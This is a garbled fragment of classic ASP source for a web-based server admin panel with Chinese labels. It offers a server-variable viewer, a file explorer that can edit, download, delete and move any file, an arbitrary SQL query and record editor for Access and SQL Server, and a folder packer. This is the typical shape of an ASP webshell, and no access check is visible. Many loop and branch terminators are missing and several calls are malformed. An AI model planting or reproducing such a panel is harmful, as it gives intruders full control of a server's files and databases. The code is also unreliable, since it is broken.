Echo StrEncode(Request.Cookies(sVariable)(sKey))
Echo "</span></td></tr>"
Echo "<tr><td valign=top style='width:130px;'> <span class=fixSpan style='width:130px;' title='" & sVariable & "'>" & sVariable & "</span></td><td style='padding-left:7px;'>" & StrEncode(Request.Cookies(sVariable)) & "</td></tr>"
End If
Echo sFooter
Echo "<br />" & Replace(sHeader, "{$s}", "ServerVariables 變量查看")
For Each sVariable In Request.ServerVariables
Echo "<tr><td> " & sVariable & ":</td><td style='padding-left:7px;' class=fixTable>" & StrEncode(Request.ServerVariables(sVariable)) & "</li>"
Echo sFooter
End Sub
Sub PageFso()
Select Case theAct
Case "rename"
Case "download"
Case "del"
Case "newone"
Case "saveas"
Case "save"
Case "showedit"
Case "showimage"
Case "copy", "move"
End Select
If theAct <> "" Then thePath = GetPost("truePath")
End Sub
Sub FsoFileExplorer()
Dim objX, theFolder, folderId, extName, parentFolderName
Dim strPath
If isDebugMode = False Then On Error Resume Next
If thePath = "" Then thePath = rootPath
strPath = thePath
If oFso.FolderExists(strPath) = False Then
ShowErr(thePath & " 目錄不存在或者不允許訪問!")
End If
Set theFolder = oFso.GetFolder(strPath)
parentFolderName = oFso.GetParentFolderName(strPath) & "\"
Echo "<form method=post action='" & url & "'>"
Echo Replace(sHeader, "{$s}", "FSO文件瀏覽操作器")
Echo "<td colspan=2> "
Echo "路徑: <input style='width:500px;' name=thePath value=""" & HtmlEncode(thePath) & """>"
Echo "<input type=hidden name=truePath value=""" & HtmlEncode(thePath) & """>"
Echo " <input type=button value='提交' onclick=Command('submit');>"
Echo " <input type=button value=上傳 onclick=Command('upload')>"
Echo "</td>"
Echo "</tr>"
Echo "<tr><td colspan=2 class=trHead> </td></tr>"
Echo "<tr><td valign=top>"
Echo "<input type=hidden name=theAct>"
Echo "<input type=hidden name=param>"
Echo "<input type=hidden value=PageFso name=PageName>"
Echo "<table width='99%' align=center>"
Echo "<tr><td colspan=4 class=trHead> </td></tr><tr class=td><td>"
If parentFolderName <> "\" Then
folderId = Replace(parentFolderName, "\", "\\")
Echo " <a href=""javascript:changeThePath("" & folderId & "");"">↑回上級(jí)目錄</a>"
End If
Echo "</td><td align=center width=80>大小</td>"
Echo "<td align=center width=140>最后修改</td><td align=center>操作</td></tr>"
For Each objX In theFolder.SubFolders
folderId = Replace(objX.Path, "\", "\\")
Echo "<tr title=""" & objX.Name & """><td> <font color=CCCCFF>■</font>"
Echo "<span class=fixSpan style='width:180;'>"
Echo "<a href=""javascript:changeThePath("" & folderId & "");"">"& objX.Name & "</a></span>"
Echo "</td>"
Echo "<td align=center>-</td>"
Echo "<td align=center>" & objX.DateLastModified & "</td><td>"
Echo "<input type=checkbox name=checkBox value=""" & objX.Name & """>"
Echo "<input type=button onclick=""Command('rename',"" & objX.Name & "");"" value='Ren' title=重命名>"
Echo "<input type=button value='SaveAs' title=另存為 onclick=""Command('saveas',"" & Replace(objX.Path, "\", "\\") & "")"">"
Echo "</td></tr>"
For Each objX In theFolder.Files
If Left(objX.Path, Len(rootPath)) <> rootPath Then
folderId = ""
folderId = Replace(Replace(UrlEncode(Mid(objX.Path, Len(rootPath) + 1)), "%2E", "."), , "+", "%20")
End If
Echo "<tr title=""" & objX.Name & """><td> <font color=CCCCFF>□</font>"
Echo "<span class=fixSpan style='width:180;'>"
If folderId = "" Then
Echo objX.Name
Echo "<a href='" & Replace(folderId, "%5C", "/") & "' target=_blank>" & objX.Name & "</a>"
End If
Echo "</span></td><td align=center>" & GetTheSize(objX.Size) & "</td>"
Echo "<td align=center>" & objX.DateLastModified & "</td><td>"
Echo "<input type=checkbox name=checkBox value=""" & objX.Name & """>"
extName = LCase(oFso.GetExtensionName(objX.Path))
If InStr(editableFileExt, "$" & extName & "$") > 0 Then
Echo "<input type=button value='Edit' title=編輯 onclick=""Command('showedit',"" & objX.Name & "");"">"
End If
If InStr(imageFileExt, "$" & extName & "$") > 0 Then
Echo "<input type=button value='View' title=查看圖片 onclick=""Command('showimage',"" & objX.Name & "");"">"
End If
If extName = "mdb" Then
Echo "<input type=button value='Access' title=數(shù)據(jù)庫操作 onclick=Command('access',""" & objX.Name & """)>"
End If
Echo "<input type=button value='D' title=下載 onclick=""Command('download',"" & objX.Name & "")"">"
Echo "<input type=button value='Ren' title=重命名 onclick=""Command('rename',"" & objX.Name & "")"">"
Echo "<input type=button value='S' title=另存為 onclick=""Command('saveas',"" & Replace(objX.Path, "\", "\\") & "")"">"
Echo "</td></tr>"
Echo "<tr class=td><td colspan=3></td>"
Echo "<td><input type=checkbox name=checkAll onclick=checkAllBox(this);>"
Echo "<input type=button value='Delete' onclick=Command('del')>"
Echo "<input type=button value='Pack' title=打包選中文件(夾) onclick=Command('pack')>"
Echo "</td></tr></table>"
Echo "</td><td width='20%' valign=top align=center>"
Echo "<input type=button value=刷新 onclick=this.form.thePath.value=this.form.truePath.value;Command('submit');><br/>"
Echo "<input type=button value=新建文件 onclick=Command('newone','file')><br/>"
Echo "<input type=button value=新建文件夾 onclick=Command('newone','folder')><hr style='color:#d8d8f0;'/>"
Echo "移動(dòng)選中文件(夾)到<br/><input value=""" & HtmlEncode(thePath) & """ name=MoveTo><br/><input type=button value='移動(dòng)' onclick=Command('move');><hr style='color:#d8d8f0;'/>"
Echo "復(fù)制選中文件(夾)到<br/><input value=""" & HtmlEncode(thePath) & """ name=CopyTo><br/><input type=button value='復(fù)制' onclick=Command('copy');><hr style='color:#d8d8f0;'/>"
Echo "</td></tr>"
Echo sFooter
Echo "</form>"
Set theFolder = Nothing
End Sub
Sub RenOne()
Dim objX, strPath, aryParam, isFile, isFolder
If isDebugMode = False Then On Error Resume Next
aryParam = Split(GetPost("param"), ",")
strPath = GetPost("truePath") & "\"
aryParam(0) = strPath & aryParam(0)
isFile = oFso.FileExists(aryParam(0))
isFolder = oFso.FolderExists(aryParam(0))
If isFile = False And isFolder = False Then
End If
If isFile = False Then
Set objX = oFso.GetFolder(aryParam(0))
objX.Name = aryParam(1)
Set objX = oFso.GetFile(aryParam(0))
objX.Name = aryParam(1)
End If
Set objX = Nothing
End Sub
Sub DownTheFile()
Dim oStream, strPath
If isDebugMode = False Then On Error Resume Next
strPath = GetPost("truePath") & "\" & GetPost("param")
Set oStream = Server.CreateObject("adodb.stream")
oStream.Type = 1
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & GetPost("param")
Response.AddHeader "Content-Length", oStream.Size
Response.Charset = "UTF-8"
Response.ContentType = "Application/Octet-Stream"
Response.BinaryWrite oStream.Read
Set oStream = Nothing
End Sub
Sub DelOne()
Dim objX, strPath
If isDebugMode = False Then On Error Resume Next
strPath = GetPost("truePath") & "\"
For Each objX In Request.Form("checkBox")
If oFso.FolderExists(strPath & objX) = True Then
Call oFso.DeleteFolder(strPath & objX, True)
If oFso.FileExists(strPath & objX) = True Then
Call oFso.DeleteFile(strPath & objX, True)
End If
End If
End Sub
Sub MoveCopyOne()
Dim objX, strPath, strMoveTo, strCopyTo
If isDebugMode = False Then On Error Resume Next
strMoveTo = GetPost("MoveTo")
strCopyTo = GetPost("CopyTo")
strPath = GetPost("truePath") & "\"
If theAct = "move" Then
strMoveTo = strMoveTo & "\"
strCopyTo = strCopyTo & "\"
End If
For Each objX In Request.Form("checkBox")
If theAct = "move" Then
If InStr(strMoveTo, strPath & objX) > 0 Then
End If
If oFso.FileExists(strPath & objX) = True Then
Call oFso.MoveFile(strPath & objX, strMoveTo & objX)
Call oFso.MoveFolder(strPath & objX, strMoveTo & objX)
End If
If InStr(strCopyTo, strPath & objX) > 0 Then
End If
If oFso.FileExists(strPath & objX) = True Then
Call oFso.CopyFile(strPath & objX, strCopyTo & objX)
Call oFso.CopyFolder(strPath & objX, strCopyTo & objX)
End If
End If
End Sub
Sub NewOne()
Dim objX, strPath, aryParam
If isDebugMode = False Then On Error Resume Next
aryParam = Split(GetPost("param"), ",")
strPath = GetPost("truePath") & "\" & aryParam(0)
If aryParam(1) = "file" Then
Call oFso.CreateTextFile(strPath, False)
End If
End Sub
Sub ShowEdit()
Dim theFile, strPath
If isDebugMode = False Then On Error Resume Next
strPath = GetPost("truePath") & "\" & GetPost("param")
If Right(strPath, 1) = "\" Then strPath = Left(strPath, Len(strPath) - 1)
Set theFile = oFso.OpenTextFile(strPath, 1, False)
Echo "<form method=post action=" & url & ">"
Echo Replace(Replace(sHeader, "{$s}", "FSO文本編輯器"), "=2", "=1")
Echo "<input type=hidden name=theAct>"
Echo "<input type=hidden value=PageFso name=PageName>"
Echo "<tr>"
Echo "<td height=22> <input name=truePath value=""" & strPath & """ style=width:500px;>"
Echo "<input type=submit value=查看 onClick=this.form.theAct.value='showedit';></td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> <textarea name=fileContent style='width:735px;height:500px;'>"
Echo HtmlEncode(theFile.ReadAll())
Echo "</textarea></td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=trHead> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=td align=center><input type=button name=Submit value=保存 onClick=""if(confirm('確認(rèn)保存修改?')){this.form.theAct.value='save';this.form.submit();}"">"
Echo "<input type=reset value=重置><input type=button onclick='window.close();' value=關(guān)閉>"
Echo "<input type=button value=預(yù)覽 onclick=preView('1'); title='以HTML方式在新窗口中預(yù)覽當(dāng)前代碼'></td>"
Echo "</tr>"
Echo "</form>"
Echo "</table>"
Set theFile = Nothing
End Sub
Sub SaveToFile()
Dim theFile, strPath, fileContent
If isDebugMode = False Then On Error Resume Next
fileContent = GetPost("fileContent")
strPath = GetPost("truePath")
Set theFile = oFso.OpenTextFile(strPath, 2, True)
theFile.Write fileContent
Set theFile = Nothing
End Sub
Sub SaveAs()
Dim strPath, aryParam, isFile
If isDebugMode = False Then On Error Resume Next
aryParam = Split(GetPost("param"), ",")
aryParam(0) = aryParam(0)
aryParam(1) = aryParam(1)
isFile = oFso.FileExists(aryParam(0))
If isFile = True Then
oFso.CopyFile aryParam(0), aryParam(1), False
oFso.CopyFolder aryParam(0), aryParam(1), False
End If
End Sub
Sub ShowImage()
Dim stream, strPath, fileContentType
If isDebugMode = False Then On Error Resume Next
strPath = GetPost("truePath") & "\" & GetPost("param")
Set stream = Server.CreateObject("adodb.stream")
stream.Type = 1
Response.BinaryWrite stream.Read
Set stream = Nothing
End Sub
Sub PageDBTool()
ShowTitle("Access + SQL Server 數(shù)據(jù)庫操作")
Echo "<form method=post action=""" & url & """>"
If theAct <> "" And theAct <> "Query" And theAct <> "ShowTables" Then
Echo "</form>"
End If
Select Case theAct
Case "Query"
Case "ShowTables"
End Select
Echo "</form>"
End Sub
Sub ShowDBTool()
Echo "<input type=hidden value=PageDBTool name=PageName>"
Echo "<input type=hidden name=theAct>"
Echo "<input type=hidden name=param>"
Echo Replace(sHeader, "{$s}", "Access + SQL Server 數(shù)據(jù)庫操作")
Echo "<tr>"
Echo "<td height=50 align=center colspan=2>"
Echo "<select onchange=""this.form.thePath.value=this.value;this.value='';""><option value=''>模板選擇"
Echo "<option value='DataSource;UserName;PassWord;'>MDB(1)"
Echo "<option value='sql:Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & rootPath & "\db.mdb'>MDB(2)"
Echo "<option value='sql:Provider=SQLOLEDB.1;Server=(local);User ID=UserName;Password=***;Database=Pubs;'>SQL Server"
Echo "<option value='sql:Dsn=DsnName;'>數(shù)據(jù)源"
Echo "</select> "
Echo "<input name=thePath type=text id=thePath value=""" & HtmlEncode(thePath) & """ size=60>"
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=trHead> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td>"
Echo "<input type=submit name=Submit value='提 交' onclick=""this.form.theAct.value='ShowTables';"">"
Echo "<input type=reset value='重 置'> "
Echo "</td>"
Echo "</tr>"
Echo "</table>"
End Sub
Sub ShowTables()
Dim Cat, objTable, objColumn, intColSpan, objSchema
If isDebugMode = False Then On Error Resume Next
Echo sSqlSelect & "<textarea name=sql rows=1 style='width:647px;'></textarea>"
Echo " <input type=button value=執(zhí)行查詢 onclick=""this.form.theAct.value='ShowQuery';Command('Query','0');"">"
Echo "<input type=button value=- onclick='if(this.form.sql.rows>3)this.form.sql.rows-=3;'>"
Echo "<input type=button value=+ onclick='this.form.sql.rows+=3;'>"
Echo "<br/>"
Echo Replace(sHeader, "{$s}", "數(shù)據(jù)表及結(jié)構(gòu)查看")
Set Cat = Server.CreateObject("ADOX.Catalog")
Cat.ActiveConnection = conn.ConnectionString
Echo "<tr><td width='20%' valign=top>"
For Each objTable In Cat.Tables
Echo "<span class=fixSpan title='" & objTable.Name & "' onclick=""Command('Query',this.title);this.disabled=true;"" "
Echo "style='width:94%;padding-left:8px;cursor:hand;'>" & objTable.Name & "</span>"
Echo "</td><td>"
intColSpan = IIf(isSqlServer = True, "4", "6")
For Each objTable In Cat.Tables
Echo "<table width=98% align=center>"
Echo "<tr>"
Echo "<td class=trHead colspan=" & intColSpan & "> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td colspan=" & intColSpan & " class=td> <strong>"
Echo objTable.Name & "</strong></td>"
Echo "</tr>"
Echo "<tr align=center>"
Echo "<td align=left width=*> 列名</td>"
Echo "<td width=80>類型</td>"
Echo "<td width=60>大小</td>"
Echo "<td width=60>可否為空</td>"
If isSqlServer = False Then
Echo "<td width=50>默認(rèn)值</td>"
Echo "<td width=100>描述</td>"
End If
Echo "</tr>"
For Each objColumn In Cat.Tables(objTable.Name).Columns
Echo "<tr align=center>"
Echo "<td align=left><span style='width:98%;padding-left:5px;'>" & objColumn.Name & "</a></td>"
Echo "<td>" & GetDataType(objColumn.Type) & "</td>"
If objColumn.DefinedSize <> 0 Then
Echo "<td>" & objColumn.DefinedSize & "</td>"
Echo "<td>" & IIf(objColumn.Precision <> 0, objColumn.Precision, " ") & "</td>"
End If
Echo "<td>" & IIf(objColumn.Attributes = 1, "False", "True") & "</td>"
If isSqlServer = False Then
Echo "<td><span class=fixSpan style='width:40px;padding-left:5px;' title=""" & HtmlEncode(objColumn.Properties("Default").value) & """>"
Echo HtmlEncode(objColumn.Properties("Default").value) & "</span></td>"
Echo "<td align=left><span class=fixSpan style='width:95px;padding-left:5px;' title=""" & objColumn.Properties("Description") & """>"
Echo objColumn.Properties("Description") & "</span></td>"
End If
Echo "</tr>"
Echo "<tr>"
Echo "<td colspan=" & intColSpan & " class=td> </td>"
Echo "</tr>"
Echo "</table><br/>"
Echo "</td>"
Echo "</tr>"
Echo sFooter
Set Cat = Nothing
End Sub
Sub ShowQuery()
Dim i, j, x, rs, sql, sqlB, sqlC, Cat, intPage, objTable, strParam, strTable, strPrimaryKey, sExec
If isDebugMode = False Then On Error Resume Next
sql = GetPost("sql")
strParam = GetPost("param")
strTable = GetPost("theTable")
Set rs = Server.CreateObject("Adodb.RecordSet")
If IsNumeric(strParam) = True Then
intPage = strParam
intPage = 1
strTable = strParam
sql = ""
End If
If sql = "" Then
sql = "Select * From [" & strTable & "]"
End If
For i = 1 To Request.Form("KeyWord").Count
If Request.Form("KeyWord")(i) <> "" Then
sqlC = Replace(Request.Form("KeyWord")(i), "'", "''")
sqlC = IIf(Request.Form("JoinTag")(i) = " like ", "'" & sqlC & "'", sqlC)
sqlB = sqlB & "[" & Request.Form("Fields")(i) & "]" & Request.Form("JoinTag")(i) & sqlC & Request.Form("JoinTag2")(i)
End If
If sqlB <> "" Then
sql = "Select * From [" & strTable & "] Where " & sqlB
If Right(sql, 4) = " Or " Then sql = Left(sql, Len(sql) - 4)
If Right(sql, 5) = " And " Then sql = Left(sql, Len(sql) - 5)
End If
Echo sSqlSelect & "<input type=hidden name=sql value=""" & HtmlEncode(sql) & """>"
Echo "<textarea name=sqlB rows=1 style='width:647px;'>" & HtmlEncode(sql) & "</textarea>"
Echo " <input type=button value=執(zhí)行查詢 onclick=""this.form.sql.value=this.form.sqlB.value;Command('Query','0');"">"
Echo "<input type=button value=- onclick='if(this.form.sqlB.rows>3)this.form.sqlB.rows-=3;'>"
Echo "<input type=button value=+ onclick='this.form.sqlB.rows+=3;'>"
Echo "<input type=hidden name=theTable value=""" & HtmlEncode(strTable) & """>"
Echo "<br/>"
Echo Replace(sHeader, "{$s}", "SQL查詢器")
Set Cat = Server.CreateObject("ADOX.Catalog")
Cat.ActiveConnection = conn.ConnectionString
Echo "<tr><td width='20%' valign=top>"
For Each objTable In Cat.Tables
Echo "<span class=fixSpan title='" & objTable.Name & "' onclick=""Command('Query',this.title);this.disabled=true;"" "
Echo "style='width:94%;padding-left:8px;cursor:hand;'>"
If strTable = objTable.Name Then
Echo "<u>" & objTable.Name & "</u>"
Echo objTable.Name
End If
Echo "</span>"
Echo "</td><td valign=top>"
If LCase(Left(sql, 7)) = "select " Then
rs.Open sql, conn, 1, 1
rs.PageSize = PageSize
If Not rs.Eof Then
rs.AbsolutePage = intPage
End If
Echo "<div align=left><table border=1 width=490>"
Echo "<tr>"
Echo "<td height=22 class=trHead> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td height=22 class=td width=100> 查詢</td>"
Echo "</tr><tr><td align=center>"
Echo "<div><select name=Fields>"
For Each x In rs.Fields
Echo "<option value=""" & x.Name & """>" & x.Name & "</option>"
Echo "</select>"
Echo "<select name=JoinTag><option value=' like '>like</option><option value='='>=</option></select>"
Echo "<input name=KeyWord style='width:200px;'>"
Echo "<select name=JoinTag2><option value=' And '>And</option><option value=' Or '>Or</option></select> "
Echo "<input type=button value=+ onclick=""this.parentElement.outerHTML+='<div>'+this.parentElement.innerHTML+'</div>';"">"
Echo "<input type=button value=- onclick=""this.parentElement.outerHTML='';""></div> "
Echo "<input type=button value=查詢 onclick=this.form.sql.value='';this.form.param.value='1';this.form.theAct.value='Query';this.form.submit();>"
Echo "</td></tr>"
Echo "<tr><td class=td> </td></tr>"
Echo "</table></div><br/>"
If rs.Fields.Count > 0 Then
strPrimaryKey = GetPrimaryKey(strTable)
Echo "<table border=1 align=left cellpadding=0 cellspacing=0>"
Echo "<tr>"
Echo "<td height=22 class=trHead colspan=" & rs.Fields.Count + 1 & "> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td height=22 class=td width=100 align=center>操作</td>"
For j = 0 To rs.Fields.Count - 1
Echo "<td height=22 class=td width=130><span class=fixSpan title='" & rs.Fields(j).Name & "' style='width:125px;padding-left:5px;'>" & rs.Fields(j).Name & "</span></td>"
For i = 1 To rs.PageSize
If rs.Eof Then Exit For
Echo "</tr>"
Echo "<tr valign=top>"
Echo "<td height=22 align=center>"
If strPrimaryKey <> "" Then
Echo "<input type=button value=編輯 title='編輯/添加' onclick=showSqlEdit('" & strPrimaryKey & "','" & rs(strPrimaryKey) & "');>"
Echo "<input type=button value=刪除 onclick=sqlDelete('" & strPrimaryKey & "','" & rs(strPrimaryKey) & "');></td>"
Echo "<input type=button value=編輯 title='編輯/添加' onclick=alert('主鍵不存在,操作有可能導(dǎo)致重大數(shù)據(jù)庫災(zāi)難,并且該操作不可逆!');showSqlEdit('" & rs.Fields(0).Name & "','" & rs(rs.Fields(0).Name) & "');>"
Echo "<input type=button value=刪除 onclick=alert('主鍵不存在,操作有可能導(dǎo)致重大數(shù)據(jù)庫災(zāi)難,并且該操作不可逆!');sqlDelete('" & rs.Fields(0).Name & "','" & rs(rs.Fields(0).Name) & "');></td>"
End If
For j = 0 To rs.Fields.Count - 1
Echo "<td height=22><span class=fixSpan style='width:125px;padding-left:5px;'>" & HtmlEncode(IIf(Len(rs(j)) > 50, Left(rs(j), 50), rs(j))) & "</span></td>"
Echo "</tr>"
End If
Echo "<tr>"
Echo "<td height=22 class=td colspan=" & rs.Fields.Count + 1 & ">"
JavaScript("GetPageList(" & intPage & ", '" & rs.RecordCount & "','" & rs.PageCount & "', 10, '');")
Echo "</td></tr></table>"
Set rs = conn.Execute(sql, i, &H0001)
If rs.Fields.Count > 0 Then
Echo "<table border=1 align=left cellpadding=0 cellspacing=0>"
Echo "<tr>"
Echo "<td height=22 class=trHead colspan=" & rs.Fields.Count & "> </td>"
Echo "</tr><tr>"
sExec = "<tr height=22>"
For i = 0 To rs.Fields.Count - 1
Echo "<td height=22 class=td style='padding-left:7px;'>" & rs.Fields(i).Name & "</td>"
sExec = sExec & "<td style='padding:7px;'>{$" & i & "}</td>"
sExec = sExec & "</tr>"
Echo "</tr>"
Do Until rs.EOF
For i = 0 To rs.Fields.Count - 1
sExec = Replace(sExec, "{$" & i & "}", StrEncode(rs(i)) & "<br />{$" & i & "}")
For i = 0 To rs.Fields.Count - 1
sExec = Replace(sExec, "<br />{$" & i & "}", "")
Echo sExec & "</table>"
Echo "<script>alert('查詢執(zhí)行成功,按確定返回.\n刷新后可以看到執(zhí)行效果.');history.back();</script>"
End If
Set rs = Nothing
Set Cat = Nothing
Exit Sub
End If
Echo "</td>"
Echo "</tr>"
Echo sFooter
Set rs = Nothing
Set Cat = Nothing
End Sub
Sub SqlShowEdit()
Dim intFindI, intFindJ, intFindK, intFindL, intFindM, strJoinTag, multiTables, aParam
Dim i, x, rs, sql, strTable, strExtra, strParam, intI, strColumn, strValue, strPrimaryKey
If isDebugMode = False Then On Error Resume Next
sql = GetPost("sql")
strParam = GetPost("param")
strTable = GetPost("theTable")
intI = InStr(strParam, "!")
intFindI = InStr(LCase(sql), " where")
intFindJ = InStrRev(LCase(sql), "order ")
intFindK = IIf(LCase(Right(sql, 4)) = "desc", "1", "0")
strValue = Mid(strParam, intI + 1)
strColumn = Left(strParam, intI - 1)
strExtra = IIf(theAct = "next", ">", IIf(theAct = "pre", "<", ""))
If intFindJ > 0 Then sql = Left(sql, intFindJ - 1)
If intFindI > 0 Then
strJoinTag = ") And "
sql = Left(sql, intFindI + 5) & "(" & Mid(sql, intFindI + 6)
strJoinTag = " Where "
End If
If intFindK > 0 Then strExtra = IIf(strExtra = ">", "<", IIf(strExtra = "<", ">", ""))
strPrimaryKey = GetPrimaryKey(strTable)
Set rs = Server.CreateObject("Adodb.RecordSet")
If strExtra <> "" And IsNumeric(strValue) = True Then
sql = "Select Top 1" & Mid(sql, 7) & strJoinTag
sql = sql & strColumn & " " & strExtra & " " & strValue & " Order By " & strColumn & IIf(strExtra = "<", " Desc", " Asc")
sql = sql & strJoinTag & strColumn & " like '" & Replace(strValue, "'", "''") & "'"
End If
intFindM = InStr(LCase(sql), "from")
intFindI = InStr(LCase(sql), " where")
intFindL = InStr(intFindM, LCase(sql), ",", 1)
If intFindL > 0 Then
If (intFindL > intFindM) And (intFindL < intFindI) Then
multiTables = True
End If
End If
If theAct = "dbdownfile" Then
aParam = Split(strParam, "!")
strValue = Replace(aParam(1) & "!" & aParam(2), "'", "''")
sql = Replace(sql, strValue, Replace(aParam(1), "'", "''"))
Set rs = conn.Execute(sql)
Set rs = Nothing
End If
If theAct <> "edit" Then
rs.Open sql, conn, 1, 3
If rs.Eof Then
Echo "<script>alert('該記錄不存在!');history.back();</script>"
End If
If theAct = "new" Then rs.AddNew
If theAct = "del" Then
If theAct <> "pre" And theAct <> "next" Then
For Each x In rs.Fields
If strPrimaryKey <> x.Name Then
rs(x.Name) = Request.Form(x.Name & "_Column")
End If
End If
strValue = rs(strColumn)
End If
If theAct = "new" Then
sql = "Select * From [" & strTable & "] Where " & strColumn & " like '" & Replace(strValue, "'", "''") & "'"
End If
End If
rs.Open sql, conn, 1, 1
Echo "<table border=1 width=600>"
Echo "<tr>"
Echo "<td height=22 class=trHead colspan=2> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td colspan=2 class=td><font face=webdings>8</font> SQL數(shù)據(jù)修改</td>"
Echo "</tr>"
Echo "<input type=hidden value=PageDBTool name=PageName>"
Echo "<input type=hidden name=theAct value=save>"
Echo "<input type=hidden name=sql value=""" & HtmlEncode(GetPost("sql")) & """>"
Echo "<input type=hidden name=theTable value=""" & strTable & """>"
Echo "<input type=hidden value=""" & HtmlEncode(strColumn & "!" & strValue) & """ name=param>"
Echo "<input type=hidden value=""" & HtmlEncode(GetPost("thePath")) & """ name=thePath>"
For Each x In rs.Fields
Echo "<tr>"
Echo "<td height=22 width=150> " & HtmlEncode(x.Name) & "<br/> (<em>" & GetDataType(x.Type) & "</em>)"
If x.Type = 204 Or x.Type = 205 Then Echo "<input value='下載' type=button onclick=""Command('dbdownfile','" & x.Name & "')"" />"
Echo "</td>"
Echo "<td width=450> "
Echo "<textarea style='width:436;' name=""" & x.Name & "_Column""" & IIf(x.Type = 201 Or x.Type = 203, " rows=6", "")
Echo IIf(x.Properties("ISAUTOINCREMENT").Value, " disabled", "")
Echo IIf(x.Name = strPrimaryKey, " title='主鍵,由于主鍵約束,將無法被修改,也不能出現(xiàn)相同值.'", "") & ">"
Echo HtmlEncode(x.value)
Echo "</textarea></td></tr>"
Echo "<tr>"
Echo "<td colspan=2 class=td align=center>"
If multiTables = False Then
If strPrimaryKey = "" Then
Echo "<input type=button value=修改 onclick=if(confirm('確定要修改這條記錄嗎?\n此表沒有主鍵,繼續(xù)操作可能會(huì)導(dǎo)致數(shù)據(jù)庫災(zāi)難,并且該錯(cuò)誤無法被撤消.')){this.form.theAct.value='save';this.form.submit();}>"
Echo "<input type=submit value=修改 onclick=this.form.theAct.value='save';>"
Echo "<input type=button value=添加 onclick=if(confirm('確實(shí)要添加當(dāng)前為新記錄嗎?')){this.form.theAct.value='new';this.form.submit();};>"
Echo "<input type=button value=刪除 onclick=if(confirm('確實(shí)刪除當(dāng)前記錄嗎?')){this.form.theAct.value='del';this.form.submit();};>"
End If
Echo "<input type=button value=暫不支持多表操作 disabled>"
End If
Echo "<input type=reset value=重置><input type=button value=關(guān)閉 onclick='window.close();'>"
If IsNumeric(strValue) = True Then
Echo "<input type=button value=上一條 onclick=""this.form.theAct.value='pre';this.form.submit();"">"
Echo "<input type=button value=下一條 onclick=""this.form.theAct.value='next';this.form.submit();"">"
End If
Echo "</td>"
Echo "</tr>"
Echo "</table>"
Set rs = Nothing
End Sub
Sub CreateConn()
Dim connStr, mdbInfo, userName, passWord, strPath
If isDebugMode = False Then On Error Resume Next
Set conn = Server.CreateObject("Adodb.Connection")
If LCase(Left(thePath, 4)) = "sql:" Then
connStr = Mid(thePath, 5)
isSqlServer = True
mdbInfo = Split(thePath, ";")
strPath = mdbInfo(0)
strPath = strPath
If UBound(mdbInfo) >= 2 Then
userName = mdbInfo(1)
passWord = mdbInfo(2)
End If
connStr = Replace(accessStr, "{$dbSource}", strPath)
connStr = Replace(connStr, "{$userId}", userName)
connStr = Replace(connStr, "{$passWord}", passWord)
end if
conn.Open connStr
End Sub
Sub DestoryConn()
Set conn = Nothing
End Sub
Function GetDataType(flag)
Dim str
Select Case flag
Case 0 : str = "EMPTY"
Case 2 : str = "SMALLINT"
Case 3 : str = "INTEGER"
Case 4 : str = "SINGLE"
Case 5 : str = "DOUBLE"
Case 6 : str = "CURRENCY"
Case 7 : str = "DATE"
Case 8 : str = "BSTR"
Case 9 : str = "IDISPATCH"
Case 10 : str = "ERROR"
Case 11 : str = "BIT"
Case 12 : str = "VARIANT"
Case 13 : str = "IUNKNOWN"
Case 14 : str = "DECIMAL"
Case 16 : str = "TINYINT"
Case 17 : str = "UNSIGNEDTINYINT"
Case 18 : str = "UNSIGNEDSMALLINT"
Case 19 : str = "UNSIGNEDINT"
Case 20 : str = "BIGINT"
Case 21 : str = "UNSIGNEDBIGINT"
Case 72 : str = "GUID"
Case 128 : str = "BINARY"
Case 129 : str = "CHAR"
Case 130 : str = "WCHAR"
Case 131 : str = "NUMERIC"
Case 132 : str = "USERDEFINED"
Case 133 : str = "DBDATE"
Case 134 : str = "DBTIME"
Case 135 : str = "DBTIMESTAMP"
Case 136 : str = "CHAPTER"
Case 200 : str = "VARCHAR"
Case 201 : str = "LONGVARCHAR"
Case 202 : str = "VARWCHAR"
Case 203 : str = "LONGVARWCHAR"
Case 204 : str = "VARBINARY"
Case 205 : str = "LONGVARBINARY"
Case Else : str = flag
End Select
GetDataType = str
End Function
Function GetPrimaryKey(strTable)
Dim rsPrimary
If isDebugMode = False Then On Error Resume Next
Set rsPrimary = conn.OpenSchema(28, Array(Empty, Empty, strTable))
If Not rsPrimary.Eof Then GetPrimaryKey = rsPrimary("COLUMN_NAME")
Set rsPrimary = Nothing
End Function
Sub PagePack()
Server.ScriptTimeOut = 5000
If theAct = "PackIt" Or theAct = "PackOne" Then
AlertThenClose("打包成功!生成為該文件夾目錄下的" & sPacketName & "文件.\n下載下來后可以使用unpack.vbs進(jìn)行解開.")
End If
If theAct = "UnPack" Then
AlertThenClose("解開成功!解開目錄為" & sPacketName & "所在目錄.")
End If
End Sub
Sub PackTable()
Echo "<base target=_blank>"
Echo Replace(sHeader, "{$s}", "文件夾打包/解開器(需FSO支持)")
Echo "<form method=post action='" & url & "'>"
Echo "<tr>"
Echo "<td width='20%'> 打包</td>"
Echo "<td> <input name=thePath value='" & HtmlEncode(rootPath) & "' style='width:467px;'> "
Echo "<input type=hidden value=PagePack name=PageName>"
Echo "<input type=hidden value=PackIt name=theAct>"
Echo "<input type=hidden value=FSO name=Param>"
Echo "<input type=submit value='開始打包'>"
Echo "</td></tr>"
Echo "</form>"
Echo "<form method=post action='" & url & "'>"
Echo "<tr>"
Echo "<td> 解包</td>"
Echo "<td> <input name=thePath value=""" & HtmlEncode(rootPath & "\" & sPacketName) & """ style='width:467px;'> "
Echo "<input type=hidden value=PagePack name=PageName>"
Echo "<input type=hidden value=UnPack name=theAct>"
Echo "<input type=submit value='開始解包'>"
Echo "</td></tr>"
Echo "</form>"
Echo sFooter
Echo "<br />"
Echo Replace(sHeader, "{$s}", "文件夾打包器(需Shell.Application支持)")
Echo "<form method=post action='" & url & "'>"
Echo "<tr>"
Echo "<td width='20%'> 打包</td>"
